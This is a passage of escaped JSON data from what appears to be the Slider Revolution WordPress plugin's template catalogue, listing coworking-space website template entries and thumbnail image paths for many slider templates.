Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"752\":{\"id\":\"795\",\"title\":\"Coworking Space Hero\",\"alias\":\"Coworking-Space-Hero\",\"zip\":\"packs\\/Coworking-Space-Hero.zip\",\"uid\":\"b64e93198eb2b9f1662d11da891833a3\",\"img\":\"Coworking-Space-Hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-06-17 16:48:26\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"753\":{\"id\":\"796\",\"title\":\"Coworking Space Counter\",\"alias\":\"Coworking-Space-Counter\",\"zip\":\"packs\\/Coworking-Space-Counter.zip\",\"uid\":\"779df7e1cfd3e20813f4e2cfe75351e1\",\"img\":\"Coworking-Space-Counter\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-06-17 16:50:21\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"754\":{\"id\":\"797\",\"title\":\"Coworking Space Why Choose\",\"alias\":\"Coworking-Space-Why-Choose\",\"zip\":\"packs\\/Coworking-Space-Why-Choose.zip\",\"uid\":\"0148f542b5884b5508355508afc21790\",\"img\":\"Coworking-Space-Why-Choose\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-06-17 16:52:24\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"755\":{\"id\":\"798\",\"title\":\"Coworking Space Amenities\",\"alias\":\"Coworking-Space-Amenities\",\"zip\":\"packs\\/Coworking-Space-Amenities.zip\",\"uid\":\"f0c9d57fad0574ad61d55818d7fe2384\",\"img\":\"Coworking-Space-Amenities\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2024-06-17 16:54:02\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"756\":{\"id\":\"799\",\"title\":\"Coworking Space Plans\",\"alias\":\"Coworking-Space-Plans\",\"zip\":\"packs\\/Coworking-Space-Plans.zip\",\"uid\":\"d0bd67ed8369c905fab8d162e90d909c\",\"img\":\"Coworking-Space-Plans\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-06-17 16:57:42\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"757\":{\"id\":\"800\",\"title\":\"Coworking Space Testimonials\",\"alias\":\"Coworking-Space-Testimonials\",\"zip\":\"packs\\/Coworking-Space-Testimonials.zip\",\"uid\":\"4c0f0d009ffff4a2e5bcb763ba3b59df\",\"img\":\"Coworking-Space-Testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2024-06-17 16:59:24\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"758\":{\"id\":\"801\",\"title\":\"Coworking Space Join\",\"alias\":\"Coworking-Space-Join\",\"zip\":\"packs\\/Coworking-Space-Join.zip\",\"uid\":\"3ce0b13b8345324a396dc82e10b1d6d7\",\"img\":\"Coworking-Space-Join\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-06-17 17:01:34\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"759\":{\"id\":\"802\",\"title\":\"Coworking Space Footer\",\"alias\":\"Coworking-Space-Footer\",\"zip\":\"packs\\/Coworking-Space-Footer.zip\",\"uid\":\"ca80282c2de127b26fd753897c9e6fe0\",\"img\":\"Coworking-Space-Footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-06-17 17:02:36\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true}},\"slides\":{\"classic-carousel\":[{\"title\":\"Slide 1\",\"img\":\"classic-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"classic-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"classic-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"classic-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"classic-carousel\\/slide5.jpg\"}],\"classicslider\":[{\"title\":\"Slide 1\",\"img\":\"classicslider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"classicslider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"classicslider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"classicslider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"classicslider\\/slide5.jpg\"}],\"contenttabs\":[{\"title\":\"Slide 1\",\"img\":\"contenttabs\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"contenttabs\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"contenttabs\\/slide3.jpg\"}],\"facebook-feed\":[{\"title\":\"Slide 1\",\"img\":\"facebook-feed\\/slide1.jpg\"}],\"fashion\":[{\"title\":\"Slide 1\",\"img\":\"fashion\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fashion\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fashion\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fashion\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"fashion\\/slide5.jpg\"}],\"flickr-gallery\":[{\"title\":\"Slide 1\",\"img\":\"flickr-gallery\\/slide1.jpg\"}],\"gym\":[{\"title\":\"Slide 1\",\"img\":\"gym\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"gym\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"gym\\/slide3.jpg\"}],\"highlight-carousel\":[{\"title\":\"Slide 1\",\"img\":\"highlight-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"highlight-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"highlight-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"highlight-carousel\\/slide4.jpg\"}],\"highlight-showcase\":[{\"title\":\"Slide 1\",\"img\":\"highlight-showcase\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"highlight-showcase\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"highlight-showcase\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"highlight-showcase\\/slide4.jpg\"}],\"image-hero\":[{\"title\":\"Slide 1\",\"img\":\"imagehero\\/slide1.jpg\"}],\"insta-gallery\":[{\"title\":\"Slide 1\",\"img\":\"insta-gallery\\/slide1.jpg\"}],\"levanorestaurantbar\":[{\"title\":\"Slide 1\",\"img\":\"levanorestaurantbar\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"levanorestaurantbar\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"levanorestaurantbar\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"levanorestaurantbar\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"levanorestaurantbar\\/slide5.jpg\"}],\"mainfeature\":[{\"title\":\"Slide 1\",\"img\":\"mainfeature\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"mainfeature\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"mainfeature\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"mainfeature\\/slide4.jpg\"},{\"title\":\"Slide 7\",\"img\":\"mainfeature\\/slide7.jpg\"}],\"media-gallery-two\":[{\"title\":\"Slide 1\",\"img\":\"media-gallery-two\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"media-gallery-two\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"media-gallery-two\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"media-gallery-two\\/slide4.jpg\"},{\"title\":\"Slide 6\",\"img\":\"media-gallery-two\\/slide6.jpg\"}],\"media-carousel-autoplay\":[{\"title\":\"Slide 1\",\"img\":\"media-carousel-autoplay\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"media-carousel-autoplay\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"media-carousel-autoplay\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"media-carousel-autoplay\\/slide4.jpg\"},{\"title\":\"Slide 6\",\"img\":\"media-carousel-autoplay\\/slide6.jpg\"}],\"news-background-video\":[{\"title\":\"Slide 1\",\"img\":\"news-bg-video\\/slide1.jpg\"}],\"news-gallery\":[{\"title\":\"Slide 1\",\"img\":\"news-gallery\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"news-gallery\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"news-gallery\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"news-gallery\\/slide4.jpg\"}],\"news-gallery-post-based\":[{\"title\":\"Slide 1\",\"img\":\"news-gallery-post-based\\/slide1.jpg\"}],\"news-hero\":[{\"title\":\"Slide 1\",\"img\":\"news-hero\\/slide1.jpg\"}],\"news-video\":[{\"title\":\"Slide 1\",\"img\":\"news-video\\/slide1.jpg\"}],\"newsletter-hero\":[{\"title\":\"Slide 1\",\"img\":\"newsletter-hero\\/slide1.jpg\"}],\"notgeneric\":[{\"title\":\"Slide 1\",\"img\":\"notgeneric\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"notgeneric\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"notgeneric\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"notgeneric\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"notgeneric\\/slide5.jpg\"}],\"photography\":[{\"title\":\"Slide 1\",\"img\":\"photography\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"photography\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"photography\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"photography\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"photography\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"photography\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"photography\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"photography\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"photography\\/slide9.jpg\"},{\"title\":\"Slide 10\",\"img\":\"photography\\/slide10.jpg\"}],\"photography-carousel\":[{\"title\":\"Slide 1\",\"img\":\"photography-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"photography-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"photography-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"photography-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"photography-carousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"photography-carousel\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"photography-carousel\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"photography-carousel\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"photography-carousel\\/slide9.jpg\"},{\"title\":\"Slide 10\",\"img\":\"photography-carousel\\/slide10.jpg\"}],\"search-form-hero\":[{\"title\":\"Slide 1\",\"img\":\"search-form-hero\\/slide1.jpg\"}],\"showcasecarousel\":[{\"title\":\"Slide 1\",\"img\":\"showcasecarousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"showcasecarousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"showcasecarousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"showcasecarousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"showcasecarousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"showcasecarousel\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"showcasecarousel\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"showcasecarousel\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"showcasecarousel\\/slide9.jpg\"}],\"sports-hero\":[{\"title\":\"Slide 1\",\"img\":\"sportshero\\/slide1.jpg\"}],\"twitter-feed\":[{\"title\":\"Slide 1\",\"img\":\"twitter-feed\\/slide1.jpg\"}],\"vimeo-gallery\":[{\"title\":\"Slide 1\",\"img\":\"vimeo-gallery\\/slide1.jpg\"}],\"vimeohero\":[{\"title\":\"Slide 1\",\"img\":\"vimeohero\\/slide1.jpg\"}],\"web-product-dark\":[{\"title\":\"Slide 1\",\"img\":\"web-product-dark\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"web-product-dark\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"web-product-dark\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"web-product-dark\\/slide4.jpg\"}],\"web-product-dark-hero\":[{\"title\":\"Slide 1\",\"img\":\"web-product-dark-hero\\/slide1.jpg\"}],\"web-product-light-hero\":[{\"title\":\"Slide 1\",\"img\":\"web-product-light-hero\\/slide1.jpg\"}],\"webproductlight\":[{\"title\":\"Slide 1\",\"img\":\"webproductlight\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"webproductlight\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"webproductlight\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"webproductlight\\/slide4.jpg\"}],\"youtube-gallery\":[{\"title\":\"Slide 1\",\"img\":\"youtube-gallery\\/slide1.jpg\"}],\"youtubehero\":[{\"title\":\"Slide 1\",\"img\":\"youtubehero\\/slide1.jpg\"}],\"scroll-effect\":[{\"title\":\"Slide 1\",\"img\":\"scrolleffect\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"scrolleffect\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"scrolleffect\\/slide3.jpg\"}],\"content-zoom\":[{\"title\":\"Slide 1\",\"img\":\"contentzoom\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"contentzoom\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"contentzoom\\/slide3.jpg\"}],\"food-carousel\":[{\"title\":\"Slide 1\",\"img\":\"foodcarousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"foodcarousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"foodcarousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"foodcarousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"foodcarousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"foodcarousel\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"foodcarousel\\/slide7.jpg\"}],\"rotating-words\":[{\"title\":\"Slide 1\",\"img\":\"rotatingwords\\/slide1.jpg\"}],\"travel-static-captions\":[{\"title\":\"Slide 1\",\"img\":\"travel-static-captions\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"travel-static-captions\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"travel-static-captions\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"travel-static-captions\\/slide4.jpg\"}],\"concept\":[{\"title\":\"Slide 1\",\"img\":\"concept\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"concept\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"concept\\/slide3.jpg\"}],\"fullscreen-button\":[{\"title\":\"Slide 1\",\"img\":\"fullscreen-button\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fullscreen-button\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fullscreen-button\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fullscreen-button\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"fullscreen-button\\/slide5.jpg\"}],\"creativefreedom\":[{\"title\":\"Slide 1\",\"img\":\"creativefreedom\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creativefreedom\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creativefreedom\\/slide3.jpg\"}],\"parallaxscene\":[{\"title\":\"Slide 1\",\"img\":\"parallaxscene\\/slide1.jpg\"}],\"slidingoverlays\":[{\"title\":\"Slide 1\",\"img\":\"slidingoverlays\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"slidingoverlays\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"slidingoverlays\\/slide3.jpg\"}],\"web-product-light-hero-3d\":[{\"title\":\"Slide 1\",\"img\":\"web-product-light-hero-3d\\/slide1.jpg\"}],\"woobig\":[{\"title\":\"Slide 1\",\"img\":\"woobig\\/slide1.jpg\"}],\"woocommercesmall\":[{\"title\":\"Slide 1\",\"img\":\"woocommercesmall\\/slide1.jpg\"}],\"finedining\":[{\"title\":\"Slide 1\",\"img\":\"finedining\\/slide1.jpg\"}],\"agency-intro\":[{\"title\":\"Slide 1\",\"img\":\"agency-intro\\/slide1.jpg\"}],\"ourteam\":[{\"title\":\"Slide 1\",\"img\":\"ourteam\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"ourteam\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"ourteam\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"ourteam\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"ourteam\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"ourteam\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"ourteam\\/slide7.jpg\"}],\"our-team-carousel\":[{\"title\":\"Slide 1\",\"img\":\"ourteamcarousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"ourteamcarousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"ourteamcarousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"ourteamcarousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"ourteamcarousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"ourteamcarousel\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"ourteamcarousel\\/slide7.jpg\"}],\"betteryoutube\":[{\"title\":\"Slide 1\",\"img\":\"betteryoutube\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"betteryoutube\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"betteryoutube\\/slide3.jpg\"}],\"agencywebsiteheader\":[{\"title\":\"Slide 1\",\"img\":\"agencywebsiteheader\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"agencywebsiteheader\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"agencywebsiteheader\\/slide3.jpg\"}],\"comingsoon\":[{\"title\":\"Slide 1\",\"img\":\"comingsoon\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"comingsoon\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"comingsoon\\/slide3.jpg\"}],\"snowscene\":[{\"title\":\"Slide 1\",\"img\":\"snowscene\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"snowscene\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"snowscene\\/slide3.jpg\"}],\"rockband\":[{\"title\":\"Slide 1\",\"img\":\"rockband\\/slide1.jpg\"}],\"sleeklandingpage\":[{\"title\":\"Slide 1\",\"img\":\"sleeklandingpage\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"sleeklandingpage\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"sleeklandingpage\\/slide3.jpg\"}],\"applandingpage\":[{\"title\":\"Slide 1\",\"img\":\"applandingpage\\/slide1.jpg\"}],\"deskscene\":[{\"title\":\"Slide 1\",\"img\":\"deskscene\\/slide1.jpg\"}],\"cleannewsslider\":[{\"title\":\"Slide 1\",\"img\":\"cleannewsslider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cleannewsslider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cleannewsslider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"cleannewsslider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"cleannewsslider\\/slide5.jpg\"}],\"imagegallery\":[{\"title\":\"Slide 1\",\"img\":\"imagegallery\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"imagegallery\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"imagegallery\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"imagegallery\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"imagegallery\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"imagegallery\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"imagegallery\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"imagegallery\\/slide8.jpg\"}],\"standard-wp-gallery\":[{\"title\":\"Slide 1\",\"img\":\"standard-wp-gallery\\/slide1.jpg\"}],\"clean-news-post-based\":[{\"title\":\"Slide 1\",\"img\":\"clean-news-post-based\\/slide1.jpg\"}],\"interactivewhiteboard\":[{\"title\":\"Slide 